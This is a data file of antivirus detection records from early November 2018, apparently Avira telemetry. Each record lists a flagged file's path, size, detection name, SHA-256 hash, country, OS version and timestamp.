  Row(detection=Row(filename='avscan-20181102-054917-01d639f8', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-054917-01D639F8', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:49:16Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='at_richiesta.doc', filepath='AT_Richiesta.doc', filesize=192000, name='W97M/Agent.57918243.#M0.#R0'), hash='76a3f1717ad2ae8516e5f109758e8c421d5c563112c2ac1ce6b7f40cc3062367', metadata=Row(cmdline=None, country='DE', os_name='MacOS', os_vmajor='17', os_vminor='7', parentproc=None, parentsize=None, timestamp='2018-11-02T19:27:47Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-054451-63795262', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-054451-63795262', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:44:50Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='at_richiesta.doc', filepath='AT_Richiesta.doc', filesize=192000, name='W97M/Agent.57918243.#M0.#R0'), hash='76a3f1717ad2ae8516e5f109758e8c421d5c563112c2ac1ce6b7f40cc3062367', metadata=Row(cmdline=None, country='DE', os_name='MacOS', os_vmajor='17', os_vminor='7', parentproc=None, parentsize=None, timestamp='2018-11-02T17:13:23Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-060658-7a127f8a', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-060658-7A127F8A', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:06:57Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-053343-d538f93c', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-053343-D538F93C', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:33:42Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='76ae25a7110cae394c1bbe6ea856871fe9cd525bd0e41e2e495e2e90d790701d', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries 31.10.2018-36\\76AE25A7110CAE394C1BBE6EA856871FE9CD525BD0E41E2E495E2E90D790701D', filesize=148000, name='TR/Crypt.ZPACK.Gen7.#M300.#R600521'), hash='76ae25a7110cae394c1bbe6ea856871fe9cd525bd0e41e2e495e2e90d790701d', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T11:39:17Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-050536-e780b77c', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-050536-E780B77C', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:05:35Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='at_richiesta.doc', filepath='AT_Richiesta.doc', filesize=192000, name='W97M/Agent.57918243.#M0.#R0'), hash='76a3f1717ad2ae8516e5f109758e8c421d5c563112c2ac1ce6b7f40cc3062367', metadata=Row(cmdline=None, country='DE', os_name='MacOS', os_vmajor='17', os_vminor='7', parentproc=None, parentsize=None, timestamp='2018-11-02T00:03:50Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-060010-86ac8342', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-060010-86AC8342', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:00:08Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-051235-e11f7e3f', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-051235-E11F7E3F', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:12:34Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='booster_16ab2e26.exe', filepath='\\\\?\\C:\\Users\\X\\AppData\\Local\\Temp\\is-AG9JF.tmp\\booster_16ab2e26.exe', filesize=1024000, name='ADWARE/Wizrem.Gen7.#M300.#R603867'), hash='77f595070dcf1ff03dfe23d40bdc7d127bca166017718d7bcae334f003b4d1a4', metadata=Row(cmdline=None, country='UY', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc=None, parentsize=None, timestamp='2018-11-02T02:11:16Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-054410-4a7c45de', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-054410-4A7C45DE', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:44:08Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-055857-5b962856', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-055857-5B962856', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:58:56Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-060757-9d06efc3', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-060757-9D06EFC3', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:07:55Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='7d052a62c8aa657a311c064e86fc1ba3d7bebd35861fece30d3000429fed23d2', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries 31.10.2018-37\\7D052A62C8AA657A311C064E86FC1BA3D7BEBD35861FECE30D3000429FED23D2', filesize=1600000, name='TR/Dropper.Gen.#M300.#R7636'), hash='7d052a62c8aa657a311c064e86fc1ba3d7bebd35861fece30d3000429fed23d2', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T14:22:28Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-055843-5312f3b2', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-055843-5312F3B2', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:58:42Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-053758-6cc35ab2', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-053758-6CC35AB2', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:37:56Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-055737-2bff98f6', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-055737-2BFF98F6', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:57:36Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-050300-8ad0630e', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-050300-8AD0630E', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:02:59Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-053814-769abd67', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-053814-769ABD67', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:38:13Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-074818-5f2fd2b5', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_9e4d80d8\\AVSCAN-20181102-003900-7AC79805\\AVSCAN-20181102-074818-5F2FD2B5', filesize=1600000, name='Adware/Agent.urvoa.#M300.#R7636'), hash='759f2ace15a8945b44655dcdbe2da45560e0df324afd6ff0b301853ead9ed3e2', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T13:50:16Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='at_richiesta.doc', filepath='AT_Richiesta.doc', filesize=192000, name='W97M/Agent.57918243.#M0.#R0'), hash='76a3f1717ad2ae8516e5f109758e8c421d5c563112c2ac1ce6b7f40cc3062367', metadata=Row(cmdline=None, country='DE', os_name='MacOS', os_vmajor='17', os_vminor='7', parentproc=None, parentsize=None, timestamp='2018-11-02T03:33:35Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-060006-8461871b', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-060006-8461871B', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:00:04Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-054715-b8de4b4d', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-054715-B8DE4B4D', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:47:13Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='adjprog.exe', filepath='E:\\L350_L355_L550_L555_L110_L210_L300\\Adjprog.exe', filesize=5632000, name='TR/Crypt.XPACK.Gen2.#M300.#R100738'), hash='30832edce2c0babe49a581af32e7e4a87e257d22598bdcc3e501c0cecb1b33be', metadata=Row(cmdline=None, country='BR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\explorer.exe', parentsize=2872320, timestamp='2018-11-01T12:39:20Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='jet40sp5_9xnt.exe', filepath='D:\\Scan\\wulan1\\BACKUP\\BMD Street\\hysys 7.3\\aspenONEV7.3dvd1\\aes731\\aspenonev7.3dvd1\\core\\mdac27sp1\\Jet40SP5_9xNT.exe', filesize=2752000, name='W32/Virut.Gen.#M1.#R1'), hash='3c62c512ced629a03d08b8bd48dfc67b23a6d2c7ac7aaf73e307c050806188bc', metadata=Row(cmdline='Global\\\\\\\\UsGthrFltPipeMssGthrPipe778_ Global\\\\\\\\UsGthrCtrlFltPipeMssGthrPipe778 1 -2147483646 \\\\\\"Software\\\\\\\\Microsoft\\\\\\\\Windows Search\\\\\\" \\\\\\"Mozilla\\\\\\/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)\\\\\\" \\\\\\"C:\\\\\\\\ProgramData\\\\\\\\Microsoft\\\\\\\\Search\\\\\\\\Data\\\\\\\\Temp\\\\\\\\usgthrsvc\\\\\\" \\\\\\"DownLevelDaemon\\\\\\" ', country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\SearchProtocolHost.exe', parentsize=164352, timestamp='2018-11-01T11:41:27Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-155401-adca34f4', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_7d835568\\AVSCAN-20181101-154414-4AD76DC3\\AVSCAN-20181101-155401-ADCA34F4', filesize=512000, name='TR/Zugy.iks.1.#M1.#R1'), hash='4d9bfb574ec75e8583e5331b3f54b33c5500c8e5a86d66ba52669f425c06cede', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T08:54:02Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-155719-cf013ff1', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_7d835568\\AVSCAN-20181101-154414-4AD76DC3\\AVSCAN-20181101-155719-CF013FF1', filesize=512000, name='TR/Zugy.iks.1.#M1.#R1'), hash='4d9bfb574ec75e8583e5331b3f54b33c5500c8e5a86d66ba52669f425c06cede', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T08:57:19Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-154819-741fedb2', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_7d835568\\AVSCAN-20181101-154414-4AD76DC3\\AVSCAN-20181101-154819-741FEDB2', filesize=512000, name='TR/Zugy.iks.1.#M1.#R1'), hash='4d9bfb574ec75e8583e5331b3f54b33c5500c8e5a86d66ba52669f425c06cede', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T08:48:20Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='ansi.exe', filepath='D:\\DATA_SHARE\\program\\unused\\APR_15\\ERP\\System32\\Redist\\MS\\System\\ANSI\\ANSI.exe', filesize=512000, name='TR/Zugy.iks.1.#M1.#R1'), hash='4d9bfb574ec75e8583e5331b3f54b33c5500c8e5a86d66ba52669f425c06cede', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T07:29:12Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='pengarahan karyawan baru.exe', filepath='D:\\DATA_SHARE\\dini\\D_Dini\\2015\\sharing\\DINI\\DOKUMENTASI\\FOTO PENGARAHAN KARYAWAN BARU\\PENGARAHAN KARYAWAN BARU.exe', filesize=512000, name='TR/Zugy.iks.1.#M1.#R1'), hash='4d9bfb574ec75e8583e5331b3f54b33c5500c8e5a86d66ba52669f425c06cede', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T07:25:32Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='5 besok.pif', filepath='D:\\DATA_SHARE\\dini\\D_Dini\\2015\\sharing\\AUDIT RPG\\AUDIT AEON\\point 5 besok\\5 besok.pif', filesize=512000, name='TR/Zugy.iks.1.#M1.#R1'), hash='4d9bfb574ec75e8583e5331b3f54b33c5500c8e5a86d66ba52669f425c06cede', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T07:25:18Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='juli.exe', filepath='D:\\DATA_SHARE\\dini\\D_Dini\\2015\\DINI\\LPA\\BPJS KESEHATAN\\2015\\Juli\\Juli.exe', filesize=512000, name='TR/Zugy.iks.1.#M1.#R1'), hash='4d9bfb574ec75e8583e5331b3f54b33c5500c8e5a86d66ba52669f425c06cede', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T07:22:28Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='maret.scr', filepath='D:\\DATA_SHARE\\dini\\D_Dini\\2016\\RPG\\GAJI RPG\\MARET\\MARET.scr', filesize=512000, name='TR/Zugy.iks.1.#M1.#R1'), hash='4d9bfb574ec75e8583e5331b3f54b33c5500c8e5a86d66ba52669f425c06cede', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T07:27:16Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-155731-d130df28', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_7d835568\\AVSCAN-20181101-154414-4AD76DC3\\AVSCAN-20181101-155731-D130DF28', filesize=512000, name='TR/Zugy.iks.1.#M1.#R1'), hash='4d9bfb574ec75e8583e5331b3f54b33c5500c8e5a86d66ba52669f425c06cede', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T08:57:32Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='aktove+dnevnici.pif', filepath='F:\\Aktove+Dnevnici\\Aktove+Dnevnici.pif', filesize=512000, name='TR/Drop.Agent.coc.#M1.#R1'), hash='2e396b3e8f08784c63f4097171584d19bb30490f16c6363556ae06a7443a26b8', metadata=Row(cmdline=None, country='BG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\explorer.exe', parentsize=2871808, timestamp='2018-11-01T16:49:47Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='transcodedwallpaper.jpg', filepath='C:\\Users\\X\\AppData\\Roaming\\Microsoft\\Windows\\Themes\\TranscodedWallpaper.jpg', filesize=3456000, name='EXP/MS04-028.JPEG.A.#M1.#R1'), hash='45be2bb7883b7e635f1fcb40fb787f9371fd06d1ef5be60c485f05591cbe178d', metadata=Row(cmdline=None, country='TW', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\explorer.exe', parentsize=3229696, timestamp='2018-11-01T20:30:04Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='maintenancesservices.dll', filepath='C:\\Windows\\System32\\MaintenancesServices.dll', filesize=576000, name='TR/Vools.mlupg.#M1.#R1'), hash='13ab3d572b30a77009d8d417be0cce6774b7590a302ac0e6f9843e1ba693a243', metadata=Row(cmdline=None, country='VN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T10:28:58Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-095545-d47719bd', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_5b1a1b07\\AVSCAN-20181101-095509-CD66EFB1\\AVSCAN-20181101-095545-D47719BD', filesize=576000, name='TR/Vools.mlupg.#M1.#R1'), hash='13ab3d572b30a77009d8d417be0cce6774b7590a302ac0e6f9843e1ba693a243', metadata=Row(cmdline=None, country='VN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T02:55:51Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='天龙小蜜[0920.1].exe', filepath='C:\\Users\\X\\Documents\\我的YY\\977504962\\新建文件夹\\天龙小蜜[0920.1].exe', filesize=13824000, name='HEUR/AGEN.1035113.#M1.#R1'), hash='3e1ec31401bc1d02c0caf1c6955de4aed1e29063c27410aa9a2082ccd09befc3', metadata=Row(cmdline=None, country='CN', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='D:\\YY\\yy\\YY.exe', parentsize=128240, timestamp='2018-11-01T10:47:02Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='database lpa.exe', filepath='D:\\DATA_SHARE\\dini\\D_Dini\\2015\\DINI\\LPA\\DATABASE LPA\\DATABASE LPA.exe', filesize=512000, name='TR/Zugy.iks.1.#M1.#R1'), hash='4d9bfb574ec75e8583e5331b3f54b33c5500c8e5a86d66ba52669f425c06cede', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T07:22:30Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-142122-a3f8e6a5', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_2be40c18\\AVSCAN-20181101-142053-A0603B4D\\AVSCAN-20181101-142122-A3F8E6A5', filesize=4608000, name='PUA/GT32SupportGeeks.DM.#M1.#R1'), hash='408ce33176d6d102638423855a95bc325cdc515bdc2622bca6cf79f4f6e35f8a', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T13:21:18Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-155238-9fc8b926', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_7d835568\\AVSCAN-20181101-154414-4AD76DC3\\AVSCAN-20181101-155238-9FC8B926', filesize=512000, name='TR/Zugy.iks.1.#M1.#R1'), hash='4d9bfb574ec75e8583e5331b3f54b33c5500c8e5a86d66ba52669f425c06cede', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T08:52:39Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='escritura de revogação .scr', filepath='C:\\Users\\X\\Desktop\\escritura de revogação .scr', filesize=320000, name='WORM/Nenebra.A.#M1.#R1'), hash='53a514f013d76540f5daf64de34a640b8a214a9af019a5c257fd562ca7d50ee5', metadata=Row(cmdline='Global\\\\\\\\UsGthrFltPipeMssGthrPipe2_ Global\\\\\\\\UsGthrCtrlFltPipeMssGthrPipe2 1 -2147483646 \\\\\\"Software\\\\\\\\Microsoft\\\\\\\\Windows Search\\\\\\" \\\\\\"Mozilla\\\\\\/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)\\\\\\" \\\\\\"C:\\\\\\\\ProgramData\\\\\\\\Microsoft\\\\\\\\Search\\\\\\\\Data\\\\\\\\Temp\\\\\\\\usgthrsvc\\\\\\" \\\\\\"DownLevelDaemon\\\\\\" ', country='BR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\SearchProtocolHost.exe', parentsize=164352, timestamp='2018-11-01T16:41:49Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avirasecuritycenteragent.exe', filepath='c:\\program files\\avira\\antivirus\\avirasecuritycenteragent.exe', filesize=840000, name='W32/Sality.Patched.#M1.#R1'), hash='4d3390f1bd3f6b3986e670c2eabfea2e528541ac16d0a33f07254858aaf4e781', metadata=Row(cmdline='\\/LOGFILE=\\"C:\\\\ProgramData\\\\Avira\\\\Antivirus\\\\LOGFILES\\\\AviraSecurityCenterAgent-2018-10-31-07-04-18.log\\" \\/LOGLEVEL=\\"STANDARD\\" \\/UPDATE_WSC=\\"ENABLE\\" \\/VDFDATE=\\"2018-10-22T00:00:00\\" \\/TRIGGER=\\"gpschd.dll Cyclic Check\\"', country='BO', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files\\Avira\\Antivirus\\sched.exe', parentsize=248312, timestamp='2018-11-01T00:15:01Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-154019-9c63c07d', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_8528c76b\\AVSCAN-20181101-153614-64EAD598\\AVSCAN-20181101-154019-9C63C07D', filesize=3456000, name='EXP/MS04-028.JPEG.A.#M1.#R1'), hash='45be2bb7883b7e635f1fcb40fb787f9371fd06d1ef5be60c485f05591cbe178d', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T14:40:20Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='bfdd244ac3625cc291bc24b4ccedf133e2d7f1e5bd676d7335e6e77102c69987', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries 31.10.2018-33\\BFDD244AC3625CC291BC24B4CCEDF133E2D7F1E5BD676D7335E6E77102C69987', filesize=1600000, name='TR/Dropper.Gen.#M300.#R7636'), hash='bfdd244ac3625cc291bc24b4ccedf133e2d7f1e5bd676d7335e6e77102c69987', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T15:30:17Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='76qn6rort.vir', filepath='\\\\?\\C:\\Program Files\\76QN6RORTL\\76QN6RORT.VIR', filesize=832000, name='TR/Dropper.Gen.#M300.#R4133'), hash='733e354c150b4149737ae67afd29dc8e971759219779881f1f0375c6118fb5b9', metadata=Row(cmdline=None, country='BR', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-01T09:48:02Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-142514-d22ac7d8', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_ed5e65bd\\AVSCAN-20181101-141758-9212A372\\AVSCAN-20181101-142514-D22AC7D8', filesize=512000, name='DR/Vilsel.piv.#M1.#R1'), hash='55685aaf75eebc41927a2e99221f4f25d786af0339148d83a3bf552f468f6532', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T07:25:14Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='0f43d.tmp', filepath='C:\\Users\\dell\\AppData\\Local\\Temp\\0F43D.tmp', filesize=192000, name='BDS/Androm.EB.73.#M0.#R0'), hash='5f17703ba5daa3a0d89ebcf8edc87f7035aac00d53945e9d0068ac46f5e267d6', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor=None, parentproc=None, parentsize=None, timestamp='2018-11-01T09:56:49Z'), dt=datetime.date(2018, 11, 1)),
